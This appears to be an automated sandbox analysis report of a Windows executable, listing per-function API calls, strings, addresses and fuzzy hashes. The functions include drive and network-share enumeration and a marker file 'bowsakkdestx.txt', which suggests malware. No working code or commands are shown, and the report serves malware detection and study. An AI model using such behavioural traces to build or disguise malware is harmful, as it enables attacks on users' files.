                                                                                                  • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 0042594A
                                                                                                    • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                    • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                    • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                  • _free.LIBCMT ref: 00425970
                                                                                                    • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  • __lock.LIBCMT ref: 00425989
                                                                                                  • ___removelocaleref.LIBCMT ref: 00425998
                                                                                                  • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                                  • _free.LIBCMT ref: 004259C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                  • String ID:
                                                                                                  • API String ID: 626533743-0
                                                                                                  • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                  • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                                  • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                  • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                  • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                  • API String ID: 601868998-2416195885
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                  • API String ID: 2102423945-3653307630
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                    • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                                                                                    • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                    • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                    • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                    • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                                                                                  • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                  Strings
                                                                                                  • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                  • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                  • API String ID: 3123740607-798102604
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _fprintf_memset
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                  • API String ID: 3021507156-3399676524
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                  • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$CreateShowUpdate
                                                                                                  • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                  • API String ID: 2944774295-3503800400
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                                  • _memset.LIBCMT ref: 00410C4C
                                                                                                  • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 364255426-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                                  • _strlen.LIBCMT ref: 00441734
                                                                                                    • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                  • _strnlen.LIBCMT ref: 004417BF
                                                                                                  • __lock.LIBCMT ref: 004417D0
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2168648987-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                  • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                  • String ID:
                                                                                                  • API String ID: 2560635915-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0043B70B
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: HeapAlloc.KERNEL32(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _free.LIBCMT ref: 0043B71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2734353464-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041F0B6
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                  • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                  • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                  • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041E546
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                  • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                  • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                  • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041FA7B
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                  • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                                  • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                  • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041FE2B
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                  • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                                  • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                  • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                  • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                                  • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                  • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                  • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                  • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                  • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnlen
                                                                                                  • String ID: U
                                                                                                  • API String ID: 3628947076-3372436214
                                                                                                  • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                  • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                                  • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                  • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                  • API String ID: 2102423945-2013712220
                                                                                                  • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                  • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                                  • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                  • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringUuid$CreateFree
                                                                                                  • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                  • API String ID: 3044360575-2335240114
                                                                                                  • Opcode ID: 33d66bd02b00bc2acc34edfe8eeb3cae24413370cf945822c3da00e57b4ae0fc
                                                                                                  • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                  • Opcode Fuzzy Hash: 33d66bd02b00bc2acc34edfe8eeb3cae24413370cf945822c3da00e57b4ae0fc
                                                                                                  • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00423B64
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: HeapAlloc.KERNEL32(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  Strings
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                  • String ID: bad allocation
                                                                                                  • API String ID: 1059622496-2104205924
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                  • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                  Strings
                                                                                                  Yara matches
